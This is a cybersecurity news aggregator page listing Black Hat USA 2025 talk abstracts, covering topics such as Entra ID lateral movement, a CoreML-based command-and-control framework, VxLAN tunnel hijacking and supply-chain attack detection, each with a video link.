Join Black Hat USA Review Board Members for a compelling discussion on the most pressing issues facing the InfoSec community today. This distinguished panel will analyze key conference takeaways and provide valuable insights on how emerging trends will shape future security strategies. Don't miss this opportunity to hear candid perspectives from some of cybersecurity's most influential voices. By: Heather Adkins | Security Engineering Daniel Cuthbert | Global Head of Security Research Aanchal Gupta | Chief Security Officer, Adobe Jason Haddix | CEO, Hacker & Trainer, Arcanum Information Security Jeff Moss | Founder, Black Hat and DEF CON Full Session Details Available at: https://ift.tt/Ne6kX0d
source https://www.youtube.com/watch?v=DmXlafnjn0M
The Cyber Stream
Latest News for Cyber Security & Technology
Wednesday, 18 February 2026
Tuesday, 17 February 2026
Black Hat USA 2025 | Advanced Active Directory to Entra ID Lateral Movement Techniques
Is there a security boundary between Active Directory and Entra ID in a hybrid environment? The answer to this question, while still somewhat unclear, has changed over the past few years as there has been more hardening of how much "the cloud" trusts data from on-premises. The reason for this is that many threat actors, including APTs, have been making use of known lateral movement techniques to compromise the cloud from AD. In this talk, we will take a deep dive together into Entra ID and hybrid AD trust internals. We will introduce several new lateral movement techniques that allow us to bypass authentication, MFA and stealthily exfiltrate data using on-premises AD as a starting point, even in environments where the classical techniques didn't work. All these techniques are new, not really vulnerabilities, but part of the design. Several of them have been remediated with recent hardening efforts by Microsoft. Very few of them leave useful logs behind when abused. As you would expect, none of these "features" are documented. Join me for a wild ride into Entra ID internals, undocumented authentication flows and tenant compromise from on-premises AD. By: Dirk-jan Mollema | Security Researcher, Outsider Security Presentation Materials Available at: https://ift.tt/X4g86EP
source https://www.youtube.com/watch?v=rzfAutv6sB8
source https://www.youtube.com/watch?v=rzfAutv6sB8
Friday, 13 February 2026
Black Hat USA 2025 | Keynote: Threat Modeling and Constitutional Law
The legal system is terrible at threat modeling. It trusts the wrong insiders, overreacts to outsider threats, and is stodgy and sclerotic when circumstances shift. In this talk, Jennifer Granick examines constitutional law doctrines' longstanding mistakes in threat modeling—mistakes that civil libertarians have warned about for years. These missteps make it particularly difficult to for Congress, the Courts, and the public to navigate the evolving legal and political landscape ushered in by the Trump Administration. By: Jennifer Granick | Surveillance and Cybersecurity Counsel, ACLU Full Session Details Available at: https://ift.tt/y7hK3XE
source https://www.youtube.com/watch?v=H0bM5q5TtC0
source https://www.youtube.com/watch?v=H0bM5q5TtC0
Wednesday, 21 January 2026
Your Traffic Doesn't Lie: Unmasking Supply Chain Attacks via Application Behaviour
Supply chain compromises like the 2020 SolarWinds breach have shown how devastating and stealthy these attacks can be. Despite advances in provenance checks (i.e., SLSA), SBOMs, and vendor vetting, organizations still struggle to detect compromises that come in via trusted apps. In this talk, we unveil BEAM (Behavioral Evaluation of Application Metrics), an open source tool that contains a novel technique for detecting supply chain attacks purely from web traffic—no endpoint agents, no code instrumentation, just insights from the network data you're probably already collecting. We trained BEAM using over 40 billion HTTP/HTTPS transactions across thousands of global organizations. By applying LLMs to map user agents to specific apps, extracting 65 behavioral signals, and building application-specific baselines, BEAM detects deviations with over 95% accuracy—and up to 99% for highly predictable applications. It's fast, automated, and doesn't rely on vendor cooperation or manual tuning. We'll walk through how BEAM works under the hood: from enriching noisy traffic data to behavioral modeling and surfacing anomalies that reveal active compromises. Alongside prebuilt models for eight popular applications, we'll also show how organizations can build custom models for internal apps, enabling scalable monitoring for both off-the-shelf and bespoke software. This approach is new, highly effective, and purpose-built for threats that continue to bypass traditional defenses. By focusing on how applications behave—not just who built them or where they came from—BEAM gives defenders a powerful new signal against a threat that's been challenging to defend against. This session includes a live demo and practical takeaways for defenders, researchers, and security engineers alike. By: Colin Estep | Principal Engineer, Netskope Dagmawi Mulugeta | Staff Threat Research Engineer, Netskope Presentations Materials Available at: https://ift.tt/pAB1ezW
source https://www.youtube.com/watch?v=UGB5W-yJCrQ
source https://www.youtube.com/watch?v=UGB5W-yJCrQ
Wednesday, 7 January 2026
Weaponizing Apple AI for Offensive Operations
Apple's on device AI frameworks CoreML, Vision, AVFoundation enable powerful automation and advanced media processing. However, these same capabilities introduce a stealthy attack surface that allows for payload execution, covert data exchange, and fully AI assisted command and control operations. This talk introduces MLArc, a CoreML based C2 framework that abuses Apple AI processing pipeline for payload embedding, execution, and real time attacker controlled communication. By leveraging machine learning models, image processing APIs, and macOS native AI features, attackers can establish a fully functional AI assisted C2 without relying on traditional execution mechanisms or external dependencies. Beyond MLArc as a standalone C2, this talk explores how Apple's AI frameworks can be weaponized to enhance existing C2s like Mythic, providing stealthy AI assisted payload delivery, execution, and persistence. This includes the below list of Apple AI framework used for embedding Apfell Payload. CoreML - Embedding and executing encrypted shellcode inside AI models. Vision - Concealing payloads/encryption keys inside AI processed images and retrieving them dynamically to bypass detection. AVFoundation - Hiding and extracting payloads within high frequency AI enhanced audio files using steganographic techniques. This research marks the first public disclosure of Apple AI assisted payload execution and AI driven C2 on macOS, revealing a new class of offensive tradecraft that weaponizes Apple AI pipelines for adversarial operations. I will demonstrate MLArc in action, showing how Apple's AI stack can be abused to establish fileless, stealthy C2 channels that evade traditional security measures. This talk is highly technical, delivering new research and attack techniques that impact macOS security, Apple AI exploitation, and red team tradecraft. By: Hariharan Shanmugam | Lead Red Teamer Full Session Details Available at: https://ift.tt/d6lYhvI
source https://www.youtube.com/watch?v=UooCY59nQSQ
source https://www.youtube.com/watch?v=UooCY59nQSQ
Tuesday, 6 January 2026
From Spoofing to Tunneling: New Red Team's Networking Techniques for Initial Access and Evasion
Gaining initial access to an intranet is one of the most challenging parts of red teaming. If an attack chain is intercepted by an incident response team, the entire operation must be restarted. In this talk, we introduce a technique for gaining initial access to an intranet that does not involve phishing, exploiting public-facing applications, or having a valid account. Instead, we leverage the use of stateless tunnels, such as GRE and VxLAN, which are widely used by companies like Cloudflare and Amazon. This technique affects not only Cloudflare's customers but also other companies. Additionally, we will share evasion techniques that take advantage of company intranets that do not implement source IP filtering, preventing IR teams from intercepting the full attack chain. Red teamers could confidently perform password spraying within an internal network without worrying about losing a compromised foothold. Also, we will reveal a nightmare of VxLAN in Linux Kernel and RouterOS. This affects many companies, including ISPs. This feature is enabled by default and allows anyone to hijack the entire tunnel, granting intranet access, even if the VxLAN is configured on a private IP interface through an encrypted tunnel. What's worse, RouterOS users cannot disable this feature. This problem can be triggered simply by following the basic VxLAN official tutorial. Furthermore, if the tunnel runs routing protocols like BGP or OSPF, it can lead to the hijacking of internal IPs, which could result in domain compromises. We will demonstrate the attack vectors that red teamers can exploit after hijacking a tunnel or compromising a router by manipulating the routing protocols. Lastly, we will conclude the presentation by showing how companies can mitigate these vulnerabilities. Red teamers can use these techniques and tools to scan targets and access company intranets. This approach opens new avenues for further research. By: Shu-Hao Tung | Threat Researcher, Trend Micro Presentation Materials Available at: https://ift.tt/2ldANpQ
source https://www.youtube.com/watch?v=terPgwzk3dc
source https://www.youtube.com/watch?v=terPgwzk3dc
Monday, 5 January 2026
Clustered Points of Failure - Attacking Windows Server Failover Clusters
Windows Server Failover Cluster (WSFC) implementations represent a critical yet underexamined attack surface in enterprise environments. This research exposes how WSFC's architectural design inadvertently creates exploitable abuse paths and presents novel attack methodologies demonstrating how the compromise of a single cluster node can lead to complete cluster takeover, lateral movement across clustered infrastructure, and ultimately, domain compromise. This Briefing will present previously undiscovered techniques for extracting and leveraging cluster credentials, manipulating Kerberos authentication, and exploiting excessive permissions granted to cluster objects. This "set it and forget it" high-availability infrastructure represents a significant blind spot for organizations. You will leave with a better understanding of WSFC's internal security architecture, strategies for enumerating and abusing these new attack paths, and concrete defensive guidance for protecting organizations from these new abuses. By: Garrett Foster | Senior Security Researcher, SpecterOps, Inc.
source https://www.youtube.com/watch?v=FSRmPwfMYs0
source https://www.youtube.com/watch?v=FSRmPwfMYs0
Friday, 2 January 2026
Out Of Control: How KCFG and KCET Redefine Control Flow Integrity in the Windows Kernel
Virtual Secure Mode, or VSM, on Windows marked the most significant leap in security innovation in quite some time, allowing the hypervisor to provide unprecedented protection to the Windows OS. With VSM features like Credential Guard, preventing in-memory credential theft and Hypervisor-Protected Code Integrity (HVCI), protecting against unsigned kernel-mode code, VSM has significantly reshaped the way many offensive security practitioners and threat actors alike think about tradecraft. In the exploitation world, similar shifts have occurred with both Control Flow Guard (CFG) and Intel Control Flow Enforcement Technology (CET) being readily available in user-mode. However, we don't hear or read much about their kernel-mode counter parts, KCFG and KCET. Why is this if CFG and CET are both relatively well-established exploit mitigations in user-mode? At the time when CFG in user-mode was first released, kernel mode was the highest security boundary available on Windows – therefore making the implementation of CFG, or any CFI mitigation in kernel mode, impossible. However, since we now have a higher security boundary on Windows, thanks to the hypervisor, it is now possible to robustly implement CFG and CET in the Windows kernel! This talk will cover what kernel mode CFI would look like without the presence of a hypervisor; why KCFG and KCET rely on VTL 1; how these mitigations differ from their user-mode counterparts; known limitations which exist today, including the recent deprecation of the next iteration of CFG known as eXtended Control Flow Guard (XFG); and the future of kernel-mode exploitation on Windows in the presence of KCFG and KCET. By: Connor McGarr | Software Engineer, Prelude Security Presentation Materials Available at: https://ift.tt/5jlwhHR
source https://www.youtube.com/watch?v=LflYlvJ4vSU
source https://www.youtube.com/watch?v=LflYlvJ4vSU
Monday, 22 December 2025
Keynote: From Script Kiddie to Cyber Kingpin: Preventing the Predictable Progression
What the cruelest hack in history can teach us about the pathway to serious cybercrime. The Vastaamo hack shocked the world but when the hacker behind it was unmasked it came as no surprise. What can the story of Julius Kivimaki teach us about teenage hacking culture and how we can end the cycle. It's a problem that's come back into the fore with high profile hacks from Scattered Spider as Cyber Correspondent and author Joe Tidy explains in this keynote talk. By: Joe Tidy | Cyber Correspondent, BBC Full Session Details Available at: https://ift.tt/m5A48ak
source https://www.youtube.com/watch?v=TPMXnZihZxg
source https://www.youtube.com/watch?v=TPMXnZihZxg
Friday, 19 December 2025
AppleStorm - Unmasking the Privacy Risks of Apple Intelligence
Apple Intelligence, Apple's newest AI product, is designed to enhance productivity with AI while maintaining Apple's focus on user experience and privacy, often highlighting its use of localized models as a key advantage, combined with its Private Cloud Compute models. But how well do these assurances hold up under scrutiny? While Apple emphasizes privacy as a core principle, my findings challenge some of these claims, illustrating the importance of scrutinizing AI-driven assistants before widespread adoption. In this talk, we take a closer look at the data flows within Apple Intelligence, examining how it interacts with user data and the potential security and privacy risks that come with it. Using traffic analysis and OS inspection techniques, we explore many of the different flows within Apple Intelligence and answer: what information is accessed, how it moves through the system, and if and where it gets transmitted. We'll explore various interactions and features of Apple Intelligence. We'll show how some features are processed locally on the device, while others involve transmitting data to Apple's servers. While some of these data flows are legitimate and necessary, others raise privacy concerns that Apple has acknowledged. Covering topics from encrypted traffic to potential data leaks, this presentation offers practical insights for both users and security professionals. By: Yoav Magid | Senior Security Researcher, Lumia Security Presentation Materials Available at: https://ift.tt/6OVBzau
source https://www.youtube.com/watch?v=iL2McWODDnc
source https://www.youtube.com/watch?v=iL2McWODDnc
Monday, 15 December 2025
Subscribe to:
Comments (Atom)
-
Germany recalled its ambassador to Russia for a week of consultations in Berlin following an alleged hacker attack on Chancellor Olaf Scho...
-
Android’s May 2024 security update patches 38 vulnerabilities, including a critical bug in the System component. The post Android Update ...